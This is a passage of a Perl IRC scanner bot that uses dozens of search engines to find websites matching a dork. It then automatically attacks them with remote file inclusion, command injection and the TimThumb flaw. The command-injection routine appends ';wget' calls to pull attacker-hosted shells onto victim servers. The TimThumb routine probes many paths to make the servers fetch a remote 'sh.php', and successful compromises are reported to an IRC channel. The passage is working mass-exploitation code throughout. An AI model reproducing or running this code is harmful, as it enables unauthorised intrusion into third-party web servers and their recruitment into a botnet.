  796.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Exalead",$type); } exit; }
  797.     }
  798.     if ($engine =~ /lycos/i) {
  799.         if ($pid = fork) { waitpid($pid, 0); }
  800.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lycos",$type); } exit; }
  801.     }
  802.     if ($engine =~ /hotbot/i) {
  803.         if ($pid = fork) { waitpid($pid, 0); }
  804.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hotbot",$type); } exit; }
  805.     }
  806.     if ($engine =~ /aol/i) {
  807.         if ($pid = fork) { waitpid($pid, 0); }
  808.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Aol",$type); } exit; }
  809.     }
  810.     if ($engine =~ /sapo/i) {
  811.         if ($pid = fork) { waitpid($pid, 0); }
  812.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sapo",$type); } exit; }
  813.     }
  814.     if ($engine =~ /duck/i) {
  815.         if ($pid = fork) { waitpid($pid, 0); }
  816.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Duck",$type); } exit; }
  817.     }
  818.     if ($engine =~ /yause/i) {
  819.         if ($pid = fork) { waitpid($pid, 0); }
  820.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yause",$type); } exit; }
  821.     }
  822.     if ($engine =~ /baidu/i) {
  823.         if ($pid = fork) { waitpid($pid, 0); }
  824.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Baidu",$type); } exit; }
  825.     }
  826.     if ($engine =~ /black/i) {
  827.         if ($pid = fork) { waitpid($pid, 0); }
  828.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Black",$type); } exit; }
  829.     }
  830.         if ($engine =~ /onet/i) {
  831.         if ($pid = fork) { waitpid($pid, 0); }
  832.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Onet",$type); } exit; }
  833.     }
  834.         if ($engine =~ /sizuka/i) {
  835.         if ($pid = fork) { waitpid($pid, 0); }
  836.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sizuka",$type); } exit; }
  837.     }
  838.         if ($engine =~ /walla/i) {
  839.         if ($pid = fork) { waitpid($pid, 0); }
  840.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Walla",$type); } exit; }
  841.     }
  842.         if ($engine =~ /demos/i) {
  843.         if ($pid = fork) { waitpid($pid, 0); }
  844.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Demos",$type); } exit; }
  845.     }
  846.         if ($engine =~ /rose/i) {
  847.         if ($pid = fork) { waitpid($pid, 0); }
  848.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Rose",$type); } exit; }
  849.     }
  850.         if ($engine =~ /seznam/i) {
  851.         if ($pid = fork) { waitpid($pid, 0); }
  852.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Seznam",$type); } exit; }
  853.     }
  854.         if ($engine =~ /tiscali/i) {
  855.         if ($pid = fork) { waitpid($pid, 0); }
  856.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tiscali",$type); } exit; }
  857.     }
  858.         if ($engine =~ /naver/i) {
  859.         if ($pid = fork) { waitpid($pid, 0); }
  860.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Naver",$type); } exit; }
  861.     }  
  862.         if ($engine =~ /amidalla/i) {
  863.         if ($pid = fork) { waitpid($pid, 0); }
  864.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AmiDalLa",$type); } exit; }
  865.     }
  866.         if ($engine =~ /buscar/i) {
  867.         if ($pid = fork) { waitpid($pid, 0); }
  868.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BusCaR",$type); } exit; }
  869.     }
  870.         if ($engine =~ /kvasir/i) {
  871.         if ($pid = fork) { waitpid($pid, 0); }
  872.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KvaSiR",$type); } exit; }
  873.     }
  874.         if ($engine =~ /excite/i) {
  875.         if ($pid = fork) { waitpid($pid, 0); }
  876.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eXciTe",$type); } exit; }
  877.     }
  878.         if ($engine =~ /interia/i) {
  879.         if ($pid = fork) { waitpid($pid, 0); }
  880.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"InteRia",$type); } exit; }
  881.     }
  882.         if ($engine =~ /snz/i) {
  883.         if ($pid = fork) { waitpid($pid, 0); }
  884.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SnZ",$type); } exit; }
  885.     }
  886.         if ($engine =~ /rambler/i) {
  887.         if ($pid = fork) { waitpid($pid, 0); }
  888.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RambLer",$type); } exit; }
  889.     }  
  890.         if ($engine =~ /yandex/i) {
  891.         if ($pid = fork) { waitpid($pid, 0); }
  892.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YaNdeX",$type); } exit; }
  893.     }
  894.         if ($engine =~ /doogate/i) {
  895.         if ($pid = fork) { waitpid($pid, 0); }
  896.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DooGatE",$type); } exit; }
  897.     }
  898.         if ($engine =~ /sogou/i) {
  899.         if ($pid = fork) { waitpid($pid, 0); }
  900.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SoGoU",$type); } exit; }
  901.     }
  902.         if ($engine =~ /joeant/i) {
  903.         if ($pid = fork) { waitpid($pid, 0); }
  904.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JoEaNt",$type); } exit; }
  905.     }
  906.         if ($engine =~ /terra/i) {
  907.         if ($pid = fork) { waitpid($pid, 0); }
  908.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TeRrA",$type); } exit; }
  909.     }
  910.         if ($engine =~ /youdao/i) {
  911.         if ($pid = fork) { waitpid($pid, 0); }
  912.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YoUdAo",$type); } exit; }
  913.     }
  914.         if ($engine =~ /amfibi/i) {
  915.         if ($pid = fork) { waitpid($pid, 0); }
  916.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AmFiBi",$type); } exit; }
  917.     }
  918.         if ($engine =~ /bigclique/i) {
  919.         if ($pid = fork) { waitpid($pid, 0); }
  920.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BiGcLiQuE",$type); } exit; }
  921.     }
  922.         if ($engine =~ /dancefloor/i) {
  923.         if ($pid = fork) { waitpid($pid, 0); }
  924.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DaNcEfLoOr",$type); } exit; }
  925.     }
  926.         if ($engine =~ /rakuten/i) {
  927.         if ($pid = fork) { waitpid($pid, 0); }
  928.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RaKuTeN",$type); } exit; }
  929.     }
  930.         if ($engine =~ /nova/i) {
  931.         if ($pid = fork) { waitpid($pid, 0); }
  932.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NoVa",$type); } exit; }
  933.     }
  934.         if ($engine =~ /najdi/i) {
  935.         if ($pid = fork) { waitpid($pid, 0); }
  936.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NaJdI",$type); } exit; }
  937.     }
  938.         if ($engine =~ /goo/i) {
  939.         if ($pid = fork) { waitpid($pid, 0); }
  940.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GoO",$type); } exit; }
  941.     }
  942.         if ($engine =~ /uksubmit/i) {
  943.         if ($pid = fork) { waitpid($pid, 0); }
  944.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UkSuBmIt",$type); } exit; }
  945.     }
  946.         ###### NIEUWE ######
  947.         if ($engine =~ /netsprint/i) {
  948.         if ($pid = fork) { waitpid($pid, 0); }
  949.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NetSprint",$type); } exit; }
  950.     }
  951.         if ($engine =~ /saol/i) {
  952.         if ($pid = fork) { waitpid($pid, 0); }
  953.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"sAol",$type); } exit; }
  954.     }
  955.         if ($engine =~ /lookle/i) {
  956.                 if ($pid = fork) { waitpid($pid, 0); }
  957.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lookle",$type); } exit; }
  958.         }
  959.         if ($engine =~ /optuszoo/i) {
  960.                 if ($pid = fork) { waitpid($pid, 0); }
  961.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"optusZoo",$type); } exit; }
  962.         }
  963.         if ($engine =~ /search66/i) {
  964.                 if ($pid = fork) { waitpid($pid, 0); }
  965.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Search66",$type); } exit; }
  966.         }
  967.         if ($engine =~ /arrama/i) {
  968.         if ($pid = fork) { waitpid($pid, 0); }
  969.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Arrama",$type); } exit; }
  970.     }
  971.         if ($engine =~ /excitejp/i) {
  972.         if ($pid = fork) { waitpid($pid, 0); }
  973.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eXciteJP",$type); } exit; }
  974.     }
  975.         if ($engine =~ /biglobe/i) {
  976.         if ($pid = fork) { waitpid($pid, 0); }
  977.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BigLobe",$type); } exit; }
  978.     }
  979.         if ($engine =~ /clix/i) {
  980.         if ($pid = fork) { waitpid($pid, 0); }
  981.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clix",$type); } exit; }
  982.     }
  983.         if ($engine =~ /searchch/i) {
  984.         if ($pid = fork) { waitpid($pid, 0); }
  985.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SearchCH",$type); } exit; }
  986.     }
  987.         if ($engine =~ /cada/i) {
  988.                 if ($pid = fork) { waitpid($pid, 0); }
  989.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cada",$type); } exit; }
  990.         }
  991.         ####################
  992. }
  993. #########################################
  994. sub rfi() {
  995.         my ($chan,$bug,$dork,$engine) = @_;
  996.     my $count = 0;
  997.     my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  998.     my $num = scalar(@list);
  999.     if ($num > 0) {
  1000.         foreach my $site (@list) {
  1001.             $count++;
  1002.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$rfilogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
  1003.                                 my $coba = "http://".$site.$bug.$injector;
  1004.                                 my $test = "http://".$site.$bug;
  1005.                                 my $ceka = &get_content($test);sleep(1); &get_content($coba);sleep(1);
  1006.                                 my $cekb = &post_content($test);sleep(1); &post_content($coba);sleep(1);
  1007.                                 if ($ceka =~ /failed to open stream/i) {
  1008.                                         &rfia_xpl($test,$chan,$site,$engine);
  1009.                                 }
  1010.                                 elsif ($cekb =~ /failed to open stream/i) {
  1011.                                         &rfib_xpl($test,$chan,$site,$engine);
  1012.                                 }
  1013.                 }
  1014.         }
  1015. }
  1016. sub rfia_xpl() {
  1017. my ($url,$chan,$site,$engine) = @_;
  1018. my $dor  = $url.$botshell."?";
  1019. my $test = $url.$injector."?";
  1020. my $check = &get_content($dor);
  1021.             &get_content($test);sleep(1);
  1022.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
  1023.                         &info_main($dor,$chan,$engine,$rfilogo);
  1024.                 }
  1025. }
  1026. sub rfib_xpl() {
  1027. my ($url,$chan,$site,$engine) = @_;
  1028. my $dor  = $url.$botshell."?";
  1029. my $test = $url.$injector."?";
  1030. my $check = &post_content($dor);
  1031.             &post_content($test);sleep(1);
  1032.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
  1033.                         &info_main($dor,$chan,$engine,$rfilogo);
  1034.                 }
  1035. }
  1036. ######################## RCE
  1037. sub rce() {
  1038.         my ($chan,$bug,$dork,$engine) = @_;
  1039.     my $count = 0;
  1040.     my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  1041.     my $num = scalar(@list);
  1042.     if ($num > 0) {
  1043.         foreach my $site (@list) {
  1044.             $count++;
  1045.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$rcelogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
  1046.                                 my $coba = "http://".$site.$bug.";wget%20".$botshell." && wget%20".$injector."";
  1047.                                 my $test = "http://".$site.$bug.";echo '0wn3d';";
  1048.                                 my $ceka  = &get_content($test); sleep(1); &get_content($coba); sleep(1);
  1049.                                 my $cekb =  &post_content($test); sleep(1); &post_content($coba); sleep(1);
  1050.                                 if ($ceka =~ /0wn3d/i) {
  1051.                                         &rce_xpl($site,$chan,$site,$engine);
  1052.                                 }
  1053.                                 elsif ($cekb =~ /0wn3d/i) {
  1054.                                         &rce_xpl($site,$chan,$site,$engine);
  1055.                                 }
  1056.                 }
  1057.         }
  1058. }
  1059.  
  1060. sub rce_xpl() {
  1061. my ($url,$chan,$site,$engine) = @_;
  1062. my $dor  = "http://".$site."h4rd.php";
  1063. my $test = "http://".$site."pb.php";
  1064. my $check = &get_content($dor);
  1065.             &get_content($test);sleep(1);
  1066.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
  1067.                         &info_main($dor,$chan,$engine,$rfilogo);
  1068.                 }
  1069. }
  1070.  
  1071. ######################## timrfi
  1072. sub timrfi() {
  1073.      my ($chan,$bug,$dork,$engine) = @_;
  1074.      my $count = 0;
  1075.      my @list = search_engine($chan,$bug,$dork,$engine,$timlogo);
  1076.      my $num = scalar(@list);
  1077.      if ($num > 0) {
  1078.          foreach my $site (@list) {
  1079.              $count++;
  1080.              if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$timlogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
  1081.                                 my $vuln = "http://".$site.$bug;
  1082.                                        
  1083.                                 if(get_content("http://".$site.$bug."/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = ""; &get_content("http://".$site.$bug."/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1084.                                 elsif(get_content("http://".$site.$bug."includes/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/"; &get_content("http://".$site.$bug."includes/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1085.                                 elsif(get_content("http://".$site.$bug."functions/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/"; &get_content("http://".$site.$bug."functions/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1086.                                 elsif(get_content("http://".$site.$bug."options/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "options/"; &get_content("http://".$site.$bug."options/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1087.                                 elsif(get_content("http://".$site.$bug."scripts/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/"; &get_content("http://".$site.$bug."scripts/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1088.                                 elsif(get_content("http://".$site.$bug."modules/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "modules/"; &get_content("http://".$site.$bug."modules/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1089.                                 elsif(get_content("http://".$site.$bug."tools/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/"; &get_content("http://".$site.$bug."tools/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1090.                                 elsif(get_content("http://".$site.$bug."thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "thumb/"; &get_content("http://".$site.$bug."thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1091.                                 elsif(get_content("http://".$site.$bug."js/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "js/"; &get_content("http://".$site.$bug."js/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1092.                                 elsif(get_content("http://".$site.$bug."lib/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/"; &get_content("http://".$site.$bug."lib/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1093.                                 elsif(get_content("http://".$site.$bug."library/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/"; &get_content("http://".$site.$bug."library/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1094.                                 elsif(get_content("http://".$site.$bug."tools/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/thumb/"; &get_content("http://".$site.$bug."tools/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1095.                                 elsif(get_content("http://".$site.$bug."tools/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/timthumb/"; &get_content("http://".$site.$bug."tools/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1096.                                 elsif(get_content("http://".$site.$bug."timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "timthumb/"; &get_content("http://".$site.$bug."timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1097.                                 elsif(get_content("http://".$site.$bug."scripts/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/thumb/"; &get_content("http://".$site.$bug."scripts/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1098.                                 elsif(get_content("http://".$site.$bug."scripts/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/timthumb/"; &get_content("http://".$site.$bug."scripts/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1099.                                 elsif(get_content("http://".$site.$bug."library/functions/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/functions/"; &get_content("http://".$site.$bug."library/functions/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1100.                                 elsif(get_content("http://".$site.$bug."library/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/timthumb/"; &get_content("http://".$site.$bug."library/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1101.                                 elsif(get_content("http://".$site.$bug."library/resource/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/resource/"; &get_content("http://".$site.$bug."library/resource/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1102.                                 elsif(get_content("http://".$site.$bug."library/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/thumb/"; &get_content("http://".$site.$bug."library/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1103.                                 elsif(get_content("http://".$site.$bug."lib/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/timthumb/"; &get_content("http://".$site.$bug."lib/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1104.                                 elsif(get_content("http://".$site.$bug."lib/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/thumb/"; &get_content("http://".$site.$bug."lib/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1105.                                 elsif(get_content("http://".$site.$bug."lib/script/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/script/timthumb/"; &get_content("http://".$site.$bug."lib/script/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1106.                                 elsif(get_content("http://".$site.$bug."lib/custom/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/custom/"; &get_content("http://".$site.$bug."lib/custom/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1107.                                 elsif(get_content("http://".$site.$bug."layouts/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "layouts/"; &get_content("http://".$site.$bug."layouts/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1108.                                 elsif(get_content("http://".$site.$bug."includes/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/timthumb/"; &get_content("http://".$site.$bug."includes/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1109.                                 elsif(get_content("http://".$site.$bug."custom/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "custom/"; &get_content("http://".$site.$bug."custom/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1110.                                 elsif(get_content("http://".$site.$bug."framework/includes/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/includes/"; &get_content("http://".$site.$bug."framework/includes/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1111.                                 elsif(get_content("http://".$site.$bug."framework/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/thumb/"; &get_content("http://".$site.$bug."framework/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1112.                                 elsif(get_content("http://".$site.$bug."functions/scripts/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/scripts/"; &get_content("http://".$site.$bug."functions/scripts/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1113.                                 elsif(get_content("http://".$site.$bug."functions/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/timthumb/"; &get_content("http://".$site.$bug."functions/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1114.                                 elsif(get_content("http://".$site.$bug."images/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "images/"; &get_content("http://".$site.$bug."images/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1115.                                 elsif(get_content("http://".$site.$bug."inc/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "inc/"; &get_content("http://".$site.$bug."inc/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1116.                                 elsif(get_content("http://".$site.$bug."includes/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/thumb/"; &get_content("http://".$site.$bug."includes/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1117.                                 elsif(get_content("http://".$site.$bug."/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = ""; &get_content("http://".$site.$bug."/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1118.                                 elsif(get_content("http://".$site.$bug."includes/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/"; &get_content("http://".$site.$bug."includes/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1119.                                 elsif(get_content("http://".$site.$bug."functions/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/"; &get_content("http://".$site.$bug."functions/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1120.                                 elsif(get_content("http://".$site.$bug."options/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "options/"; &get_content("http://".$site.$bug."options/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1121.                                 elsif(get_content("http://".$site.$bug."scripts/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/"; &get_content("http://".$site.$bug."scripts/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1122.                                 elsif(get_content("http://".$site.$bug."modules/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "modules/"; &get_content("http://".$site.$bug."modules/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1123.                                 elsif(get_content("http://".$site.$bug."tools/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/"; &get_content("http://".$site.$bug."tools/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1124.                                 elsif(get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "thumb/"; &get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1125.                                 elsif(get_content("http://".$site.$bug."js/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "js/"; &get_content("http://".$site.$bug."js/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1126.                                 elsif(get_content("http://".$site.$bug."lib/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/"; &get_content("http://".$site.$bug."lib/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1127.                                 elsif(get_content("http://".$site.$bug."library/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/"; &get_content("http://".$site.$bug."library/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1128.                                 elsif(get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/thumb/"; &get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1129.                                 elsif(get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/thumb/"; &get_content("http://".$site.$bug."tools/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1130.                                 elsif(get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "thumb/"; &get_content("http://".$site.$bug."thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1131.                                 elsif(get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/thumb/"; &get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1132.                                 elsif(get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/thumb/"; &get_content("http://".$site.$bug."scripts/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1133.                                 elsif(get_content("http://".$site.$bug."library/functions/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/functions/"; &get_content("http://".$site.$bug."library/functions/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1134.                                 elsif(get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/thumb/"; &get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1135.                                 elsif(get_content("http://".$site.$bug."library/resource/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/resource/"; &get_content("http://".$site.$bug."library/resource/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1136.                                 elsif(get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/thumb/"; &get_content("http://".$site.$bug."library/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1137.                                 elsif(get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/thumb/"; &get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
